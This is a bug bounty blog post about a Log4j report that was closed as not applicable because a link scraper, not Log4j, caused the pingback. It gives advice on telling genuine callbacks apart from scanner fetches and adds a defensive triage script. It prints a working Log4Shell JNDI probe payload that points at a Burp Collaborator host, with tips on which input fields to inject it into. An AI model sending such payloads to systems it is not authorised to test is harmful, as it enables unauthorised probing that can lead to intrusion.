InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties…


Facts to clear about Log4J for “Bug Bounty Hunters”

Jaydev Ahire
Published in InfoSec Write-ups
Dec 20, 2021

In my first blog, I mentioned that I would post a blog about each and every finding. I also got DMs asking for details/methods of my recent P1 findings. As I am in the final year of my undergrad, doing full-time bug bounty hunting and learning some new concepts, I failed to deliver blog posts on time. Sorry for that :)

From January next year I will start uploading all blogs. But this blog is very important for the current situation.

Let's start…

Two days ago I shared a screenshot of my Log4j HackerOne report. After that, I received lots of DMs on Instagram asking for help and guidance about Log4j.

I want to clear up some doubts and misunderstandings about this bug.

Three reports submitted to HackerOne programs:

  1. 1st report: Not Applicable, but bounty awarded for helping them troubleshoot
  2. 2nd report: Valid and bounty awarded (the same program as the 1st report)
  3. 3rd report: Triaged (different program)

In this blog, we are going to talk only about the first report.

As you all know, Log4j is the latest vulnerability, and there are very few resources available about finding Log4j on websites. You can find Log4j anywhere: in name fields, the UA string, support forms… literally any input field on a site.

Let me clear up one thing: if you're getting a pingback from the company’s IP address (not from Google or AWS), then report it; you don’t need to perform full RCE. (As per my experience so far on HackerOne.)

The site has a feature for creating your own channel, where you can add members and post information, questions, etc. So I submitted the Log4j payload, including my Burp Collaborator link for pingback requests, as a question in my channel.

Payload: ${jndi:ldap://p1ry70m3caxtxo2qlpl4l6smgdm3as.burpcollaborator.net/a}

And BOOM!! For me, not for the company :)

I got an HTTP pingback from the company’s IP.

HTTP Pingback Request.

Submitted the report.

Then the company asked me for the UA string.

Then I submitted the UA string, i.e.,

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Again the company asked me for a PoC video.

After that, the company asked me to retest and capture the video, because they had implemented some kind of algorithm or feature to trace such activity.

I submitted the video PoC and, after one day of waiting, they decided to close this report as NA and awarded me for helping them troubleshoot.

After reading this there were a lot of questions in my mind: if this is not Log4j, then how was this payload triggered? I was like:

Then I asked them about this; after some time another developer came and replied:

What a noob I am :)

It was triggered because of the link scraping function.

Then I used the Canary Log4Shell token to test again, and this time I got a pingback from an AWS host.

Remember: only report when you’re getting a pingback from the company’s IP address. If you report a pingback from Google or AWS they’ll close it as NA; there is very little chance that your (AWS/Google pingback) report will get accepted as a valid issue.

So what about this pingback from Google/AWS? Don't worry, I've got this.

One of my LinkedIn connections, Sanyam Kakkar, told me about this:

“I also got into the same situation when I was working on a different situation, but concluded that the issue was in a 3rd-party API which actually belongs to Google; that's why the ping request came from Google.
Then I sent the report to Google and they responded:

The payload you demonstrate in the report would indeed have been triggered by Log4Shell, but it also contains a hostname written literally. Our systems often scan for hostnames and URLs in various user inputs (e.g. chat messages, emails), resolve them via DNS, and try to fetch the URLs, for example, to determine if the payload is malicious, or whether the message itself should be classified as spam. We think this is what happened here. It's indeed Google's behavior to ping the domain if they find it anywhere in their products.”
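To make the distinction above concrete, here is an added triage script (not part of the original post, and not the author's or any program's tooling) that sorts out-of-band callback records by what the calling host actually did, so that a literal-hostname scrape is not mistaken for an evaluated ${jndi:...} lookup. The sample interaction records, the tok1/tok2/tok3 names, the oob.example.net listener domain and the in-scope CIDR are all constructed placeholders, and the script assumes your listener logs the protocol of each interaction.

```python
import ipaddress
from typing import Dict, Iterable, List

# Constructed sample of out-of-band callback records in the shape a
# collaborator-style listener might log: protocol, source IP, queried name,
# request path and client User-Agent. Every value here is made up.
SAMPLE_INTERACTIONS: List[Dict[str, str]] = [
    # tok1: an in-scope host resolved the name, then fetched the literal URL
    # over HTTP with a preview-bot UA, the pattern a link scraper produces.
    {"proto": "dns", "src": "203.0.113.10", "name": "tok1.oob.example.net", "path": "", "ua": ""},
    {"proto": "http", "src": "203.0.113.10", "name": "tok1.oob.example.net", "path": "/a",
     "ua": "Mozilla/5.0 (compatible; LinkPreviewBot/1.0)"},
    # tok2: same pattern, but from an address outside the program's scope,
    # i.e. a third-party URL scanner of the kind described in the quote above.
    {"proto": "dns", "src": "198.51.100.7", "name": "tok2.oob.example.net", "path": "", "ua": ""},
    {"proto": "http", "src": "198.51.100.7", "name": "tok2.oob.example.net", "path": "/a",
     "ua": "Mozilla/5.0 (compatible; URLSafetyScanner/2.0)"},
    # tok3: an in-scope host resolved the name and then opened an LDAP
    # connection, which is what a JNDI lookup does and a URL scraper does not.
    {"proto": "dns", "src": "203.0.113.22", "name": "tok3.oob.example.net", "path": "", "ua": ""},
    {"proto": "ldap", "src": "203.0.113.22", "name": "tok3.oob.example.net", "path": "/a", "ua": ""},
]

# Hypothetical address space of the program under test (placeholder CIDR).
IN_SCOPE_CIDRS = ["203.0.113.0/24"]

# Verdicts ranked by how specific the observed behaviour is. Only the top one
# is evidence that Log4j evaluated the ${jndi:...} string; the others are the
# situations this post describes as NA or as needing verification.
VERDICT_RANK = {
    "out-of-scope-source": 0,   # third-party scanner (Google/AWS style); closed as NA
    "other-in-scope": 1,        # unrecognised protocol from an in-scope address
    "dns-only-in-scope": 2,     # name resolved only: lookup or scanner, cannot tell
    "http-fetch-in-scope": 3,   # literal URL fetched over HTTP: link-scraper pattern
    "jndi-lookup-in-scope": 4,  # LDAP/RMI connection: the JNDI lookup actually ran
}


def is_in_scope(src: str, cidrs: Iterable[str] = IN_SCOPE_CIDRS) -> bool:
    """True if the source address falls inside one of the program's CIDRs."""
    ip = ipaddress.ip_address(src)
    return any(ip in ipaddress.ip_network(c, strict=False) for c in cidrs)


def classify(rec: Dict[str, str], cidrs: Iterable[str] = IN_SCOPE_CIDRS) -> str:
    """Map one callback record to a verdict from VERDICT_RANK."""
    if not is_in_scope(rec["src"], cidrs):
        return "out-of-scope-source"
    proto = rec["proto"].lower()
    if proto in ("ldap", "ldaps", "rmi"):
        return "jndi-lookup-in-scope"
    if proto in ("http", "https"):
        return "http-fetch-in-scope"
    if proto == "dns":
        return "dns-only-in-scope"
    return "other-in-scope"


def triage(records: Iterable[Dict[str, str]],
           cidrs: Iterable[str] = IN_SCOPE_CIDRS) -> Dict[str, str]:
    """Keep, per unique token (the first DNS label), the most specific verdict seen."""
    best: Dict[str, str] = {}
    for rec in records:
        token = rec["name"].split(".", 1)[0]
        verdict = classify(rec, cidrs)
        if token not in best or VERDICT_RANK[verdict] > VERDICT_RANK[best[token]]:
            best[token] = verdict
    return best


if __name__ == "__main__":
    for token, verdict in sorted(triage(SAMPLE_INTERACTIONS).items()):
        print(f"{token}: {verdict}")
```

Run as-is, it reports tok1 as an in-scope HTTP fetch (the situation in this post's first report: the company's own IP, but a link scraper fetching the literal URL), tok2 as an out-of-scope source (a third-party scanner, the Google/AWS case) and tok3 as an in-scope JNDI lookup. The design choice is to rank by protocol rather than by source address alone: a JNDI lookup has to speak LDAP or RMI to the callback host, while a link-preview or URL-safety scanner only resolves the name and fetches it over HTTP, so a DNS-only or HTTP-only hit, even from the company's address space, still needs the kind of verification the program asked for here.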

The (HackerOne program) company’s security staff were very good. As this was my first Log4j report, I learned a lot of new things from my mistakes; it helped me, and I successfully submitted two valid Log4j reports.

All the information in this blog is as per my experience and mistakes. My humble request to all readers and bug hunters: if you have any corrections or additional information, please feel free to comment or DM me and I’ll add them or make the changes in the blog.

Feel free to connect: LinkedIn, Twitter

(PS: Please don't ask about the bounty amount and all these things in DMs.)


Written by Jaydev Ahire

CEH | eCPPT | eWPT | GOOGLE, APPLE, ASUS HOF | P1 Warrior | Security Researcher |

Responses (1)


That's really helpful for me... because I'm really confused about pingbacks. I think I'm gonna leave a target because I don't know what a pingback actually is, and what details the server gives me after scanning with a canarytoken.
That's a really nice article sir....❤️❤️❤️😍😍
